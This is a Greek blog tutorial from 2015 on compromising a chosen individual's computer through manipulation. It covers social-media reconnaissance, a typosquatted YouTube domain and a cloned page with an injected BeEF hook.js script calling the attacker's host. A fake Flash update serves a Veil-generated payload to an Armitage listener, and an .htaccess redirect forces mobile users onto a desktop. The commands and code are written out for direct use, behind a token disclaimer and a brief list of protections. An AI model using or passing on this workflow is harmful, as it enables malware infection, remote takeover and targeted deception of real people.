ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Τετάρτη, 18 Μαρτίου 2015

Πως εισβαλουμε στον υπολογιστη ενος στοχευμενου χρηστη(Manipulation Attack)


Τι θα χρειαστειτε;

1.Kali Linux
2.Λογαριασμο στο youtube
3.Firebug

Το σημαντικοτερο σε αυτη την επιθεση ειναι οι πληροφοριες που εχουμε για το θυμα μας και στο ποσο καλοι ειμαστε στην χειραγωγιση


Για να μαζεψουμε πληροφοριες κανουμε αναζητηση στο διαδικτυο ,κοιταμε προφιλ κοινωνικων δικτυων κτλ

Οταν εχουμε μαζεψει πληροφοριες σκεφτομαστε τον δολο και πως θα χειραγωγισουμε το θυμα
Οταν το σκεφτουμε.....ερχομαστε στην επιθεση

Παταμε εδω

φτιαχνουμε εναν λογαριασμο και επιλεγουμε Δωρεαν

θα σας εμφανιστει αυτη η επιλογη ωστε να βαλετε ενα ονομα στο (sub)domain σας


επειδη η επιθεση θα βασιστει στο youtube θελουμε να δουμε τι διαθεσιμο υπαρχει απο ολα αυτα τα subdomains που μας δινει το hostinger
Για να το δουμε αυτο θα χρησιμoποιησουμε το urlcrazy για να βρουμε αν υπαρχει κατι διαθεσιμο πχ στο subdomain wc.lt
*μπορειτε να παρακαμψετε αυτο το βημα και να βαλετε οτι θελετε 

οποτε γραφουμε σε ενα τερματικο

urlcrazy youtube.wc.lt

το urcrazy  θα κανει αναγραματισμους και μετα θα βρει αν υπαρχουν αυτα τα domain
αν βρειτε καποιο το οποιο δεν υπαρχει τοτε καταχωρηστε το

παταμε ctr+shift+f και κανουμε αναζητηση να μας βρει την καταληξη wc.lt
και βλεπουμε ποιο ειναι διαθεσιμο

 πχ εγω βρηκα το youtbe.wc.lt


οποτε το κατοχυρωνω και μετα παταω διαχειριση


κατω κατω στις επιλογες Προχωρημενο επιλεγουμε Μετατροπεας DNS ζωνης

γραφουμε σε ενα τερματικο

curl ifconfig.me

 σημειωνουμε την εξωτερικη μας ip

πηγαινουμε αλλαζουμε το A record με την εξωτερικη μας ip και  αποθηκευουμε


προωθουμε την θυρα 80 ,9999 και 3000 στο router μας
*Αν δεν ξερετε πως τοτε παταμε εδω επιλεγουμε το μοντελο του router μας και ακολουθουμε τις οδηγιες

τωρα πηγαινουμε στο youtube ,κανουμε εγγραφη η συνδεση και επιλεγουμε μεταφορτωση


επιλεγουμε προβολη διαφανειων φωτογραφιων


επιλεγουμε να ανεβασουμε φωτογραφιες απο τον υπολογιστη μας



κατεβαζουμε απο το προφιλ του θυματος φωτογραφιες και τις ανεβαζουμε

πχ ας υποθεσουμε οτι το θυμα μου ειναι η Adeanna Cooke μια απο τις ποιο ομορφες hacker στον κοσμο


οποτε κατεβαζω απο το προφιλ της και ανεβαζουμε τις φωτογραφιες στο youtube αν θελετε μπορειτε να τις επεξεργαστειτε
πχ

*για επεξεργασια φωτογραφιων υπαρχει το Gimp οποτε με apt-get install gimp το κανετε εγκατασταση η παταμε εδω για online επεξεργασια
οπως και να εχει αυτο το κομματι πως θα φτιαξετε το βιντεο και τι φωτογραφιες θα ανεβασετε βασιζετε σε εσας

οποτε συνεχιζουμε στο ανεβασμα φωτογραφιων

επιλεγουμε καποιο τραγουδι η συνομιλια που θελουμε να εχει το βιντεο με τις φωτογραφιες και κατω κατω επιλεγουμε upload

τελος επιλεγουμε την εικονα σαν εμφανιση στο βιντεο μας,βαζουμε μια επικεφαλιδα ,περιγραφη , περιμενουμε να ανεβει και επιλεγουμε publish


θα μας εμφανισει οτι το βιντεο μας εχει δημοσιευθει στον ταδε συνδεσμο ,εμεις κανουμε αντιγραφη αυτου του συνδεσμου


ανοιγουμε ενα τερματικο και γραφουμε setoolkit

επιλεγουμε 1,2,3,2

εκει που λεει  IP address for the POST back in Harvester/Tabnabbing:
δεν βαζουμε τιποτα και ποιο κατω τον συνδεσμο που μολις αντιγραψαμε
μετα επιλεγουμε y για να ξεκινησει το apache

τωρα αν γραψουμε στην url 127.0.0.1 η την τοπικη μας ip τοτε θα μας εμφανισει την αντεγραμενη σελιδα


οπως ειδατε τα γραμματα δεν μπορουν να διαβαστουν για να το διορθωσουμε αυτο γραφουμε στο τερματικο

leafpad /var/www/index.html

και προσθετουμε μετα το <head>
<meta charset=UTF-8>

αποθηκευουμε και κλεινουμε

αν γραψουμε παλι στην url 127.0.0.1 θα δουμε οτι μας τα εμφανιζει κανονικα


τωρα εφοσον εχουμε φτιαξει τον δολο μας μενει να φτιαξουμε και την επιθεση

γραφουμε στο τερματικο

leafpad /var/www/index.html

προσθετουμε αυτη την γραμμη

<script type=text/javascript src=http://youtbe.wc.lt:3000/hook.js></script>
 και αποθηκευουμε


οπου youtbe.wc.lt βαζετε το domain που εχετε φτιαξει εσεις

τωρα χρειαζομαστε το firebug

παταμε εδω ωστε να κανουμε εγκατασταση του firebug
επιλεγουμε add to firefox


επιλεγουμε install

και οταν γινει εγκατασταση τοτε θα δουμε ενα σκαθαρι πανω δεξια


το firebug σας επιτρεπει να βλεπετε και να αλλαζετε τον κωδικα της σελιδας εμεις θα το χρησιμοποιησουμε ωστε να φτιαξουμε την σελιδα

οποτε γραφουμε στην url και 127.0.0.1

με δεξι κλικ στο  πλαισιο επιλεγουμε Inspect Element with Firebug


επιλεγουμε οπως στην κατω εικονα και με το πληκτρο delete διαγραφουμε


τωρα εφοσον εφυγε το πλαισιο που ελεγε για την επιλογη γλωσσας τοτε επιλεγουμε πανω πανω που λεει html class και με δεξι κλικ επιλεγουμε copy html

γραφουμε σε ενα τερματικο

leafpad /var/www/adobe.html

και κανουμε επικολληση του κωδικα html που αντιγραψαμε

αποθηκευουμε

τωρα γραφουμε στην url 127.0.0.1/adobe.html

και βλεπουμε


γραφουμε παλι στο τερματικο

leafpad /var/www/adobe.html

παταμε ctrl+H και στην πανω γραμμη Find what γραφουμε
http:\/\/get.adobe.com\/flashplayer\/\
στην κατω γραμμη Replace with γραφουμε http://youtbe.wc.lt/adobe.exe

 αποθηκευουμε

τωρα μας μενει να βγαλουμε τον ιο οποτε θα χρειαστουμε το Veil
*αν δεν το εχετε εγκατεστημενο τοτε κοιταξτε σε παλιοτερους οδηγους*

γραφουμε σε ενα τερματικο
cd /Veil/Veil-Evasion
και ./Veil-Evasion


επιλεγουμε οτι payload θελουμε βαζουμε την εξωτερικη μας ip (η domain), και θυρα

γραφουμε generate
και το ονομα  adobe


μετα το αρχειο adobe.exe το μεταφερουμε στη διαδρομη /var/www/
με την εντολη
mv /veil-output/compiled/adobe.exe /var/www/

οποτε τωρα ειμαστε ετοιμοι

γραφουμε στην url το domain μας και βλεπουμε αν μας εμφανιζετε

πχ

αν δεν σας εχει εμφανιστει τοτε δεν εχετε προωθησει την θυρα 80 η δεν εχει μεταφερθει ακομα το A record

για να δειτε αν εχει μεταφερθει το A record γραψτε στο τερματικο

ping youtbe.wc.lt -c 2


αν δουμε την εξωτερικη μας  ip τοτε ειμαστε ενταξει οποτε πρεπει να κοιταξουμε τις ρυθμισεις στο router μας

Τωρα ξεκιναμε το BeEF και το Armitage *(κοιταξτε σε παλιοτερους οδηγους πως)

Στο Armitage ξεκιναμε να ακουει στην θυρα 9999

 και

Ξεκιναμε το BeEF (για νεοτερη εκδοση του BeEF κοιταξτε εδω)


Τελικο βημα μας μενει να στειλουμε στο θυμα μας την σελιδα που φτιαξαμε δλδ το http://youtbe.wc.lt

για να το κανουμε ποιο πηστικο γραφουμε
http://youtbe.wc.lt/?www.youtube.com/watch=fad33vwe
η
http://youtbe.wc.lt/?watch=njxdfw32

οτι βαλουμε μετα το /? δεν το πιανει οποτε γραφετε οτι θελετε εσεις

πριν το στειλουμε πηγαινουμε εδω για να κανουμε debug του συνδεσμου


και κατω κατω βλεπουμε πως θα εμφανιστει στο facebook


οποτε τωρα στελνουμε τον συνδεσμο στο θυμα μας μεσω συνομιλιας
πχ μεθοδος κινεζου "ρε συ εσυ δεν εισαι αυτη?"

οταν το θυμα πατησει τον συνδεσμο θα παει στην σελιδα μας και θα τον δουμε στο BeEF σαν zombie


επιλεγουμε πανω στο θυμα ,commands ,γραφουμε στο search redirect
επιλεγουμε Redirect Browser η Riderect Browser (iframe)  και γραφουμε στο Redirect url http://youtbe.wc.lt/adobe ωστε να τον παει στην σελιδα για να κανει ληψη του ιου


στο θυμα θα  εμφανιστει αυτο


 οταν το θυμα κατεβασει και τρεξει τον ιο τοτε θα τον δουμε σαν slave στο Armitage


τωρα εχουμε τον πληρη ελενχο του υπολογιστη του
 (δειτε σε παλιοτερους οδηγους πως θα κανετα persist)


Τι γινεται ομως αν το θυμα ειναι απο κινητο η tablet?

πολυ απλα θα ρυθμισουμε τον apache server μας να ανακατευθυνει

γραφουμε σε ενα τερματικο

a2enmod rewrite


service apache2 restart

μετα cd /etc/apache2/sites-enabled
ls

μετα nano 000-default και αλλαζουμε τo None σε All


αποθηκευουμε
και με την εντολη service apache2 restart κανουμε παλι επανεκκινηση του apache

γραφουμε

leafpad /var/www/.htaccess

και βαζουμε μεσα στο αρχειο

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "android|blackberry|googlebot-mobile|iemobile|ipad|iphone|ipod|opera mobile|palmos|webos" [NC]
RewriteRule ^$ http://youtbe.wc.lt/error [L,R=302]
</IfModule>



οπου http://youtbe.wc.lt/ βαζετε το domain που φτιαξατε

τωρα μας μενει να φτιαξουμε το αρχειο error.html

γραφουμε leafpad /var/www/error.html

και βαζουμε μεσα

<head>
<span style="font-size: 35px;"><b>Λόγω αναβάθμισης η συσκευή σας δεν υποστηρίζετε προσωρινά</b></span><br />
<span style="font-size: 35px;"><b>Παρακαλώ συνδεθείτε απο ένα σταθερό υπολογιστή</b></span></div>
<script type=text/javascript src=http://youtbe.wc.lt:3000/hook.js></script>
</head>
μην ξεχασετε να αλλαξετε το domain σας στο script του BeEF
*μπορειτε να παρετε πληροφοριες απο το κιν του θυματος οπως ip ,τοποθεσια,κωδικους κτλ *κοιταξτε παλιοτερο οδηγο με BeEF*

αποθηκευουμε και για αλλη μια φορα κανουμε επανεκκινηση του apache
service apache2 restart

οταν το θυμα πατησει στον συνδεσμο απο κινητο τοτε θα ανακατευθυνθει εδω


Με αυτο τον τροπο το θυμα θα παει κατευθειαν στην σελιδα error με αποτελεσμα να μην δει το βιντεο και να αναγκαστει να μπει απο τον υπολογιστη του

*Σημαντικο ειναι να γνωριζετε οτι μια επιθεση δεν πρεπει να την εφαρμοζετε πανω απο 1 φορα ,αν αποτυχει η επιθεση δοκιμαστε με αλλο τροπο ,δολο κτλ

* Μπορειτε να κανετε παρα πολλες παραλλαγες αυτης της επιθεσης
εγω σας εδειξα απλα μια μεθοδο γιαυτο την ονομασα Manipulation Attack
δλδ αυτη η επιθεση βασιζετε στην ικανοτητα να χειραγωγισετε το θυμα 
*οταν εχετε παρει προσβαση στον υπολογιστη του θυματος καλο θα ητανε να σβησετε το βιντεο

Πως θα προστατευτειτε;

1.Παντα να κοιτατε τους συνδεσμους
2.Ποτε μην κατεβαζετε αρχεια απο αγνωστες σελιδες
3.Μην στηριζεστε στο antivirus που εχετε
4.Περιοριστε τα προσωπικα σας δεδομενα στο διαδικτυο 
5.Περιοριστε τους φιλους σας στα κοινωνικα δικτυα



Δεν υπάρχουν σχόλια: